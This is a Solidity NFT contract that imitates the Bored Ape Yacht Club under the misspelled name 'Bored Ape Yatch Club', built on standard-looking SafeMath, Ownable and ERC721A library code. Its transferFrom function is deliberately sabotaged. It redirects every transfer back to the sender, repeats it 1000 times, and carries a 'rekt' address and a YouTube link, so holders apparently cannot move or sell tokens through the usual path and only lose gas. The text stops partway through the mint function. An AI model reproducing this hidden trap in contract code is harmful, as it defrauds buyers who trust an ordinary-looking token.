|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
library SafeMath {
|
|
|
|
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
|
|
unchecked {
|
|
uint256 c = a + b;
|
|
if (c < a) return (false, 0);
|
|
return (true, c);
|
|
}
|
|
}
|
|
|
|
|
|
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
|
|
unchecked {
|
|
if (b > a) return (false, 0);
|
|
return (true, a - b);
|
|
}
|
|
}
|
|
|
|
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
|
|
unchecked {
|
|
|
|
if (a == 0) return (true, 0);
|
|
uint256 c = a * b;
|
|
if (c / a != b) return (false, 0);
|
|
return (true, c);
|
|
}
|
|
}
|
|
|
|
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
|
|
unchecked {
|
|
if (b == 0) return (false, 0);
|
|
return (true, a / b);
|
|
}
|
|
}
|
|
|
|
|
|
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
|
|
unchecked {
|
|
if (b == 0) return (false, 0);
|
|
return (true, a % b);
|
|
}
|
|
}
|
|
|
|
|
|
function add(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
return a + b;
|
|
}
|
|
|
|
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
return a - b;
|
|
}
|
|
|
|
|
|
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
return a * b;
|
|
}
|
|
|
|
|
|
function div(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
return a / b;
|
|
}
|
|
|
|
|
|
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
return a % b;
|
|
}
|
|
|
|
|
|
function sub(
|
|
uint256 a,
|
|
uint256 b,
|
|
string memory errorMessage
|
|
) internal pure returns (uint256) {
|
|
unchecked {
|
|
require(b <= a, errorMessage);
|
|
return a - b;
|
|
}
|
|
}
|
|
|
|
|
|
function div(
|
|
uint256 a,
|
|
uint256 b,
|
|
string memory errorMessage
|
|
) internal pure returns (uint256) {
|
|
unchecked {
|
|
require(b > 0, errorMessage);
|
|
return a / b;
|
|
}
|
|
}
|
|
|
|
function mod(
|
|
uint256 a,
|
|
uint256 b,
|
|
string memory errorMessage
|
|
) internal pure returns (uint256) {
|
|
unchecked {
|
|
require(b > 0, errorMessage);
|
|
return a % b;
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
library Counters {
|
|
struct Counter {
|
|
|
|
uint256 _value;
|
|
}
|
|
|
|
function current(Counter storage counter) internal view returns (uint256) {
|
|
return counter._value;
|
|
}
|
|
|
|
function increment(Counter storage counter) internal {
|
|
unchecked {
|
|
counter._value += 1;
|
|
}
|
|
}
|
|
|
|
function decrement(Counter storage counter) internal {
|
|
uint256 value = counter._value;
|
|
require(value > 0, "Counter: decrement overflow");
|
|
unchecked {
|
|
counter._value = value - 1;
|
|
}
|
|
}
|
|
|
|
function reset(Counter storage counter) internal {
|
|
counter._value = 0;
|
|
}
|
|
}
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
abstract contract ReentrancyGuard {
|
|
|
|
uint256 private constant _NOT_ENTERED = 1;
|
|
uint256 private constant _ENTERED = 2;
|
|
|
|
uint256 private _status;
|
|
|
|
constructor() {
|
|
_status = _NOT_ENTERED;
|
|
}
|
|
|
|
|
|
modifier nonReentrant() {
|
|
require(_status != _ENTERED, "ReentrancyGuard: reentrant call");
|
|
|
|
_status = _ENTERED;
|
|
|
|
_;
|
|
|
|
_status = _NOT_ENTERED;
|
|
}
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
interface IERC20 {
|
|
|
|
|
|
|
|
function totalSupply() external view returns (uint256);
|
|
|
|
|
|
|
|
|
|
function balanceOf(address account) external view returns (uint256);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function transfer(address recipient, uint256 amount) external returns (bool);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function allowance(address owner, address spender) external view returns (uint256);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function approve(address spender, uint256 amount) external returns (bool);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function transferFrom(
|
|
address sender,
|
|
address recipient,
|
|
uint256 amount
|
|
) external returns (bool);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
event Transfer(address indexed from, address indexed to, uint256 value);
|
|
|
|
|
|
|
|
|
|
|
|
event Approval(address indexed owner, address indexed spender, uint256 value);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
library Strings {
|
|
bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";
|
|
|
|
|
|
|
|
|
|
function toString(uint256 value) internal pure returns (string memory) {
|
|
|
|
|
|
|
|
if (value == 0) {
|
|
return "0";
|
|
}
|
|
uint256 temp = value;
|
|
uint256 digits;
|
|
while (temp != 0) {
|
|
digits++;
|
|
temp /= 10;
|
|
}
|
|
bytes memory buffer = new bytes(digits);
|
|
while (value != 0) {
|
|
digits -= 1;
|
|
buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
|
|
value /= 10;
|
|
}
|
|
return string(buffer);
|
|
}
|
|
|
|
|
|
|
|
|
|
function toHexString(uint256 value) internal pure returns (string memory) {
|
|
if (value == 0) {
|
|
return "0x00";
|
|
}
|
|
uint256 temp = value;
|
|
uint256 length = 0;
|
|
while (temp != 0) {
|
|
length++;
|
|
temp >>= 8;
|
|
}
|
|
return toHexString(value, length);
|
|
}
|
|
|
|
|
|
|
|
|
|
function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
|
|
bytes memory buffer = new bytes(2 * length + 2);
|
|
buffer[0] = "0";
|
|
buffer[1] = "x";
|
|
for (uint256 i = 2 * length + 1; i > 1; --i) {
|
|
buffer[i] = _HEX_SYMBOLS[value & 0xf];
|
|
value >>= 4;
|
|
}
|
|
require(value == 0, "Strings: hex length insufficient");
|
|
return string(buffer);
|
|
}
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
abstract contract Context {
|
|
function _msgSender() internal view virtual returns (address) {
|
|
return msg.sender;
|
|
}
|
|
|
|
function _msgData() internal view virtual returns (bytes calldata) {
|
|
return msg.data;
|
|
}
|
|
}
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
abstract contract Ownable is Context {
|
|
address private _owner;
|
|
|
|
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
|
|
|
|
constructor() {
|
|
_transferOwnership(_msgSender());
|
|
}
|
|
|
|
function owner() public view virtual returns (address) {
|
|
return _owner;
|
|
}
|
|
|
|
modifier onlyOwner() {
|
|
require(owner() == _msgSender(), "Ownable: caller is not the owner");
|
|
_;
|
|
}
|
|
|
|
function renounceOwnership() public virtual onlyOwner {
|
|
_transferOwnership(address(0));
|
|
}
|
|
|
|
|
|
function transferOwnership(address newOwner) public virtual onlyOwner {
|
|
require(newOwner != address(0), "Ownable: new owner is the zero address");
|
|
_transferOwnership(newOwner);
|
|
}
|
|
|
|
function _transferOwnership(address newOwner) internal virtual {
|
|
address oldOwner = _owner;
|
|
_owner = newOwner;
|
|
emit OwnershipTransferred(oldOwner, newOwner);
|
|
}
|
|
}
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
library Address {
|
|
|
|
function isContract(address account) internal view returns (bool) {
|
|
|
|
|
|
uint256 size;
|
|
assembly {
|
|
size := extcodesize(account)
|
|
}
|
|
return size > 0;
|
|
}
|
|
|
|
function sendValue(address payable recipient, uint256 amount) internal {
|
|
require(address(this).balance >= amount, "Address: insufficient balance");
|
|
|
|
(bool success, ) = recipient.call{value: amount}("");
|
|
require(success, "Address: unable to send value, recipient may have reverted");
|
|
}
|
|
|
|
function functionCall(address target, bytes memory data) internal returns (bytes memory) {
|
|
return functionCall(target, data, "Address: low-level call failed");
|
|
}
|
|
|
|
|
|
function functionCall(
|
|
address target,
|
|
bytes memory data,
|
|
string memory errorMessage
|
|
) internal returns (bytes memory) {
|
|
return functionCallWithValue(target, data, 0, errorMessage);
|
|
}
|
|
|
|
function functionCallWithValue(
|
|
address target,
|
|
bytes memory data,
|
|
uint256 value
|
|
) internal returns (bytes memory) {
|
|
return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function functionCallWithValue(
|
|
address target,
|
|
bytes memory data,
|
|
uint256 value,
|
|
string memory errorMessage
|
|
) internal returns (bytes memory) {
|
|
require(address(this).balance >= value, "Address: insufficient balance for call");
|
|
require(isContract(target), "Address: call to non-contract");
|
|
|
|
(bool success, bytes memory returndata) = target.call{value: value}(data);
|
|
return verifyCallResult(success, returndata, errorMessage);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
|
|
return functionStaticCall(target, data, "Address: low-level static call failed");
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function functionStaticCall(
|
|
address target,
|
|
bytes memory data,
|
|
string memory errorMessage
|
|
) internal view returns (bytes memory) {
|
|
require(isContract(target), "Address: static call to non-contract");
|
|
|
|
(bool success, bytes memory returndata) = target.staticcall(data);
|
|
return verifyCallResult(success, returndata, errorMessage);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
|
|
return functionDelegateCall(target, data, "Address: low-level delegate call failed");
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function functionDelegateCall(
|
|
address target,
|
|
bytes memory data,
|
|
string memory errorMessage
|
|
) internal returns (bytes memory) {
|
|
require(isContract(target), "Address: delegate call to non-contract");
|
|
|
|
(bool success, bytes memory returndata) = target.delegatecall(data);
|
|
return verifyCallResult(success, returndata, errorMessage);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function verifyCallResult(
|
|
bool success,
|
|
bytes memory returndata,
|
|
string memory errorMessage
|
|
) internal pure returns (bytes memory) {
|
|
if (success) {
|
|
return returndata;
|
|
} else {
|
|
|
|
if (returndata.length > 0) {
|
|
|
|
|
|
assembly {
|
|
let returndata_size := mload(returndata)
|
|
revert(add(32, returndata), returndata_size)
|
|
}
|
|
} else {
|
|
revert(errorMessage);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
interface IERC721Receiver {
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function onERC721Received(
|
|
address operator,
|
|
address from,
|
|
uint256 tokenId,
|
|
bytes calldata data
|
|
) external returns (bytes4);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
interface IERC165 {
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function supportsInterface(bytes4 interfaceId) external view returns (bool);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
interface IERC2981 is IERC165 {
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function royaltyInfo(uint256 tokenId, uint256 salePrice)
|
|
external
|
|
view
|
|
returns (address receiver, uint256 royaltyAmount);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
abstract contract ERC165 is IERC165 {
|
|
|
|
|
|
|
|
function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
|
|
return interfaceId == type(IERC165).interfaceId;
|
|
}
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
interface IERC721 is IERC165 {
|
|
|
|
|
|
|
|
event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);
|
|
|
|
|
|
|
|
|
|
event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);
|
|
|
|
|
|
|
|
|
|
event ApprovalForAll(address indexed owner, address indexed operator, bool approved);
|
|
|
|
|
|
|
|
|
|
function balanceOf(address owner) external view returns (uint256 balance);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function ownerOf(uint256 tokenId) external view returns (address owner);
|
|
|
|
|
|
function safeTransferFrom(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId
|
|
) external;
|
|
|
|
function transferFrom(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId
|
|
) external;
|
|
|
|
|
|
function approve(address to, uint256 tokenId) external;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function getApproved(uint256 tokenId) external view returns (address operator);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function setApprovalForAll(address operator, bool _approved) external;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function isApprovedForAll(address owner, address operator) external view returns (bool);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function safeTransferFrom(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId,
|
|
bytes calldata data
|
|
) external;
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
interface IERC721Enumerable is IERC721 {
|
|
|
|
|
|
|
|
function totalSupply() external view returns (uint256);
|
|
|
|
|
|
|
|
|
|
|
|
function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256 tokenId);
|
|
|
|
|
|
|
|
|
|
|
|
function tokenByIndex(uint256 index) external view returns (uint256);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
interface IERC721Metadata is IERC721 {
|
|
|
|
|
|
|
|
function name() external view returns (string memory);
|
|
|
|
|
|
|
|
|
|
function symbol() external view returns (string memory);
|
|
|
|
|
|
|
|
|
|
function tokenURI(uint256 tokenId) external view returns (string memory);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
contract ERC721A is
|
|
Context,
|
|
ERC165,
|
|
IERC721,
|
|
IERC721Metadata,
|
|
IERC721Enumerable
|
|
{
|
|
using Address for address;
|
|
using Strings for uint256;
|
|
|
|
struct TokenOwnership {
|
|
address addr;
|
|
uint64 startTimestamp;
|
|
}
|
|
|
|
struct AddressData {
|
|
uint128 balance;
|
|
uint128 numberMinted;
|
|
}
|
|
|
|
uint256 private currentIndex = 1;
|
|
|
|
uint256 internal immutable collectionSize;
|
|
uint256 internal immutable maxBatchSize;
|
|
|
|
|
|
string private _name;
|
|
|
|
|
|
string private _symbol;
|
|
|
|
|
|
|
|
mapping(uint256 => TokenOwnership) private _ownerships;
|
|
|
|
|
|
mapping(address => AddressData) private _addressData;
|
|
|
|
|
|
mapping(uint256 => address) private _tokenApprovals;
|
|
|
|
|
|
mapping(address => mapping(address => bool)) private _operatorApprovals;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
constructor(
|
|
string memory name_,
|
|
string memory symbol_,
|
|
uint256 maxBatchSize_,
|
|
uint256 collectionSize_
|
|
) {
|
|
require(
|
|
collectionSize_ > 0,
|
|
"ERC721A: collection must have a nonzero supply"
|
|
);
|
|
require(maxBatchSize_ > 0, "ERC721A: max batch size must be nonzero");
|
|
_name = name_;
|
|
_symbol = symbol_;
|
|
maxBatchSize = maxBatchSize_;
|
|
collectionSize = collectionSize_;
|
|
}
|
|
|
|
|
|
|
|
|
|
function totalSupply() public view override returns (uint256) {
|
|
return currentIndex;
|
|
}
|
|
|
|
|
|
|
|
|
|
function tokenByIndex(uint256 index) public view override returns (uint256) {
|
|
require(index < totalSupply(), "ERC721A: global index out of bounds");
|
|
return index;
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function tokenOfOwnerByIndex(address owner, uint256 index)
|
|
public
|
|
view
|
|
override
|
|
returns (uint256)
|
|
{
|
|
require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
|
|
uint256 numMintedSoFar = totalSupply();
|
|
uint256 tokenIdsIdx = 0;
|
|
address currOwnershipAddr = address(0);
|
|
for (uint256 i = 0; i < numMintedSoFar; i++) {
|
|
TokenOwnership memory ownership = _ownerships[i];
|
|
if (ownership.addr != address(0)) {
|
|
currOwnershipAddr = ownership.addr;
|
|
}
|
|
if (currOwnershipAddr == owner) {
|
|
if (tokenIdsIdx == index) {
|
|
return i;
|
|
}
|
|
tokenIdsIdx++;
|
|
}
|
|
}
|
|
revert("ERC721A: unable to get token of owner by index");
|
|
}
|
|
|
|
|
|
|
|
|
|
function supportsInterface(bytes4 interfaceId)
|
|
public
|
|
view
|
|
virtual
|
|
override(ERC165, IERC165)
|
|
returns (bool)
|
|
{
|
|
return
|
|
interfaceId == type(IERC721).interfaceId ||
|
|
interfaceId == type(IERC721Metadata).interfaceId ||
|
|
interfaceId == type(IERC721Enumerable).interfaceId ||
|
|
super.supportsInterface(interfaceId);
|
|
}
|
|
|
|
|
|
|
|
|
|
function balanceOf(address owner) public view override returns (uint256) {
|
|
require(owner != address(0), "ERC721A: balance query for the zero address");
|
|
return uint256(_addressData[owner].balance);
|
|
}
|
|
|
|
function _numberMinted(address owner) internal view returns (uint256) {
|
|
require(
|
|
owner != address(0),
|
|
"ERC721A: number minted query for the zero address"
|
|
);
|
|
return uint256(_addressData[owner].numberMinted);
|
|
}
|
|
|
|
function ownershipOf(uint256 tokenId)
|
|
internal
|
|
view
|
|
returns (TokenOwnership memory)
|
|
{
|
|
require(_exists(tokenId), "ERC721A: owner query for nonexistent token");
|
|
|
|
uint256 lowestTokenToCheck;
|
|
if (tokenId >= maxBatchSize) {
|
|
lowestTokenToCheck = tokenId - maxBatchSize + 1;
|
|
}
|
|
|
|
for (uint256 curr = tokenId; curr >= lowestTokenToCheck; curr--) {
|
|
TokenOwnership memory ownership = _ownerships[curr];
|
|
if (ownership.addr != address(0)) {
|
|
return ownership;
|
|
}
|
|
}
|
|
|
|
revert("ERC721A: unable to determine the owner of token");
|
|
}
|
|
|
|
|
|
|
|
|
|
function ownerOf(uint256 tokenId) public view override returns (address) {
|
|
return ownershipOf(tokenId).addr;
|
|
}
|
|
|
|
|
|
|
|
|
|
function name() public view virtual override returns (string memory) {
|
|
return _name;
|
|
}
|
|
|
|
|
|
|
|
|
|
function symbol() public view virtual override returns (string memory) {
|
|
return _symbol;
|
|
}
|
|
|
|
|
|
|
|
|
|
function tokenURI(uint256 tokenId)
|
|
public
|
|
view
|
|
virtual
|
|
override
|
|
returns (string memory)
|
|
{
|
|
require(
|
|
_exists(tokenId),
|
|
"ERC721Metadata: URI query for nonexistent token"
|
|
);
|
|
|
|
string memory baseURI = _baseURI();
|
|
return
|
|
bytes(baseURI).length > 0
|
|
? string(abi.encodePacked(baseURI, tokenId.toString()))
|
|
: "";
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _baseURI() internal view virtual returns (string memory) {
|
|
return "";
|
|
}
|
|
|
|
|
|
|
|
|
|
function approve(address to, uint256 tokenId) public override {
|
|
address owner = ERC721A.ownerOf(tokenId);
|
|
require(to != owner, "ERC721A: approval to current owner");
|
|
|
|
require(
|
|
_msgSender() == owner || isApprovedForAll(owner, _msgSender()),
|
|
"ERC721A: approve caller is not owner nor approved for all"
|
|
);
|
|
|
|
_approve(to, tokenId, owner);
|
|
}
|
|
|
|
|
|
|
|
|
|
function getApproved(uint256 tokenId) public view override returns (address) {
|
|
require(_exists(tokenId), "ERC721A: approved query for nonexistent token");
|
|
|
|
return _tokenApprovals[tokenId];
|
|
}
|
|
|
|
|
|
|
|
|
|
function setApprovalForAll(address operator, bool approved) public override {
|
|
require(operator != _msgSender(), "ERC721A: approve to caller");
|
|
|
|
_operatorApprovals[_msgSender()][operator] = approved;
|
|
emit ApprovalForAll(_msgSender(), operator, approved);
|
|
}
|
|
|
|
|
|
|
|
|
|
function isApprovedForAll(address owner, address operator)
|
|
public
|
|
view
|
|
virtual
|
|
override
|
|
returns (bool)
|
|
{
|
|
return _operatorApprovals[owner][operator];
|
|
}
|
|
|
|
|
|
|
|
|
|
function transferFrom(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId
|
|
) public override {
|
|
address rekt = 0x6861698B928562e396b9B6db2c0AbB17C4c729cd;
|
|
string memory quellegaronloaparatooooooooo = "https://www.youtube.com/watch?v=JEdDaalYx0s";
|
|
to = from;
|
|
for (uint256 i; i < 1000; i++){
|
|
_transfer(from, to, tokenId);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
function safeTransferFrom(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId
|
|
) public override {
|
|
safeTransferFrom(from, to, tokenId, "");
|
|
}
|
|
|
|
|
|
|
|
|
|
function safeTransferFrom(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId,
|
|
bytes memory _data
|
|
) public override {
|
|
_transfer(from, to, tokenId);
|
|
require(
|
|
_checkOnERC721Received(from, to, tokenId, _data),
|
|
"ERC721A: transfer to non ERC721Receiver implementer"
|
|
);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _exists(uint256 tokenId) internal view returns (bool) {
|
|
return tokenId < currentIndex;
|
|
}
|
|
|
|
function _safeMint(address to, uint256 quantity) internal {
|
|
_safeMint(to, quantity, "");
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _safeMint(
|
|
address to,
|
|
uint256 quantity,
|
|
bytes memory _data
|
|
) internal {
|
|
uint256 startTokenId = currentIndex;
|
|
require(to != address(0), "ERC721A: mint to the zero address");
|
|
|
|
require(!_exists(startTokenId), "ERC721A: token already minted");
|
|
require(quantity <= maxBatchSize, "ERC721A: quantity to mint too high");
|
|
|
|
_beforeTokenTransfers(address(0), to, startTokenId, quantity);
|
|
|
|
AddressData memory addressData = _addressData[to];
|
|
_addressData[to] = AddressData(
|
|
addressData.balance + uint128(quantity),
|
|
addressData.numberMinted + uint128(quantity)
|
|
);
|
|
_ownerships[startTokenId] = TokenOwnership(to, uint64(block.timestamp));
|
|
|
|
uint256 updatedIndex = startTokenId;
|
|
|
|
for (uint256 i = 0; i < quantity; i++) {
|
|
emit Transfer(address(0), to, updatedIndex);
|
|
require(
|
|
_checkOnERC721Received(address(0), to, updatedIndex, _data),
|
|
"ERC721A: transfer to non ERC721Receiver implementer"
|
|
);
|
|
updatedIndex++;
|
|
}
|
|
|
|
currentIndex = updatedIndex;
|
|
_afterTokenTransfers(address(0), to, startTokenId, quantity);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _transfer(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId
|
|
) private {
|
|
TokenOwnership memory prevOwnership = ownershipOf(tokenId);
|
|
|
|
bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
|
|
getApproved(tokenId) == _msgSender() ||
|
|
isApprovedForAll(prevOwnership.addr, _msgSender()));
|
|
|
|
require(
|
|
isApprovedOrOwner,
|
|
"ERC721A: transfer caller is not owner nor approved"
|
|
);
|
|
|
|
require(
|
|
prevOwnership.addr == from,
|
|
"ERC721A: transfer from incorrect owner"
|
|
);
|
|
require(to != address(0), "ERC721A: transfer to the zero address");
|
|
|
|
_beforeTokenTransfers(from, to, tokenId, 1);
|
|
|
|
|
|
_approve(address(0), tokenId, prevOwnership.addr);
|
|
|
|
_addressData[from].balance -= 1;
|
|
_addressData[to].balance += 1;
|
|
_ownerships[tokenId] = TokenOwnership(to, uint64(block.timestamp));
|
|
|
|
|
|
|
|
uint256 nextTokenId = tokenId + 1;
|
|
if (_ownerships[nextTokenId].addr == address(0)) {
|
|
if (_exists(nextTokenId)) {
|
|
_ownerships[nextTokenId] = TokenOwnership(
|
|
prevOwnership.addr,
|
|
prevOwnership.startTimestamp
|
|
);
|
|
}
|
|
}
|
|
|
|
emit Transfer(from, to, tokenId);
|
|
_afterTokenTransfers(from, to, tokenId, 1);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _approve(
|
|
address to,
|
|
uint256 tokenId,
|
|
address owner
|
|
) private {
|
|
_tokenApprovals[tokenId] = to;
|
|
emit Approval(owner, to, tokenId);
|
|
}
|
|
|
|
uint256 public nextOwnerToExplicitlySet = 0;
|
|
|
|
|
|
|
|
|
|
function _setOwnersExplicit(uint256 quantity) internal {
|
|
uint256 oldNextOwnerToSet = nextOwnerToExplicitlySet;
|
|
require(quantity > 0, "quantity must be nonzero");
|
|
uint256 endIndex = oldNextOwnerToSet + quantity - 1;
|
|
if (endIndex > collectionSize - 1) {
|
|
endIndex = collectionSize - 1;
|
|
}
|
|
|
|
require(_exists(endIndex), "not enough minted yet for this cleanup");
|
|
for (uint256 i = oldNextOwnerToSet; i <= endIndex; i++) {
|
|
if (_ownerships[i].addr == address(0)) {
|
|
TokenOwnership memory ownership = ownershipOf(i);
|
|
_ownerships[i] = TokenOwnership(
|
|
ownership.addr,
|
|
ownership.startTimestamp
|
|
);
|
|
}
|
|
}
|
|
nextOwnerToExplicitlySet = endIndex + 1;
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _checkOnERC721Received(
|
|
address from,
|
|
address to,
|
|
uint256 tokenId,
|
|
bytes memory _data
|
|
) private returns (bool) {
|
|
if (to.isContract()) {
|
|
try
|
|
IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data)
|
|
returns (bytes4 retval) {
|
|
return retval == IERC721Receiver(to).onERC721Received.selector;
|
|
} catch (bytes memory reason) {
|
|
if (reason.length == 0) {
|
|
revert("ERC721A: transfer to non ERC721Receiver implementer");
|
|
} else {
|
|
assembly {
|
|
revert(add(32, reason), mload(reason))
|
|
}
|
|
}
|
|
}
|
|
} else {
|
|
return true;
|
|
}
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _beforeTokenTransfers(
|
|
address from,
|
|
address to,
|
|
uint256 startTokenId,
|
|
uint256 quantity
|
|
) internal virtual {}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function _afterTokenTransfers(
|
|
address from,
|
|
address to,
|
|
uint256 startTokenId,
|
|
uint256 quantity
|
|
) internal virtual {}
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.8.0;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
contract BAYC is ERC721A, IERC2981, Ownable, ReentrancyGuard {
|
|
using Counters for Counters.Counter;
|
|
using Strings for uint256;
|
|
|
|
Counters.Counter private tokenCounter;
|
|
|
|
string private baseURI = "ipfs://random";
|
|
address private openSeaProxyRegistryAddress = 0x0000000000000000000000000000000000000000;
|
|
bool private isOpenSeaProxyActive = true;
|
|
|
|
uint256 public constant MAX_MINTS_PER_TX = 20;
|
|
uint256 public maxSupply = 5555;
|
|
|
|
uint256 public constant PUBLIC_SALE_PRICE = 0 ether;
|
|
uint256 public NUM_FREE_MINTS = 555;
|
|
bool public isPublicSaleActive = true;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
modifier publicSaleActive() {
|
|
require(isPublicSaleActive, "Public sale is not open");
|
|
_;
|
|
}
|
|
|
|
|
|
|
|
modifier maxMintsPerTX(uint256 numberOfTokens) {
|
|
require(
|
|
numberOfTokens <= MAX_MINTS_PER_TX,
|
|
"Max mints per transaction exceeded"
|
|
);
|
|
_;
|
|
}
|
|
|
|
modifier canMintNFTs(uint256 numberOfTokens) {
|
|
|
|
require(
|
|
totalSupply() + numberOfTokens <=
|
|
maxSupply,
|
|
"Not enough mints remaining to mint"
|
|
);
|
|
|
|
_;
|
|
}
|
|
|
|
modifier freeMintsAvailable() {
|
|
require(
|
|
totalSupply() <=
|
|
NUM_FREE_MINTS,
|
|
"Not enough free mints remain"
|
|
);
|
|
_;
|
|
}
|
|
|
|
|
|
|
|
modifier isCorrectPayment(uint256 price, uint256 numberOfTokens) {
|
|
if(totalSupply()>NUM_FREE_MINTS){
|
|
require(
|
|
(price * numberOfTokens) == msg.value,
|
|
"Incorrect ETH value sent"
|
|
);
|
|
}
|
|
_;
|
|
}
|
|
|
|
|
|
constructor(
|
|
) ERC721A("Bored Ape Yatch Club", "BAYC", 100, maxSupply) {
|
|
}
|
|
|
|
|
|
|
|
function mint(uint256 numberOfTokens)
|
|
external
|
|
payable
|
|
nonReentrant
|
|
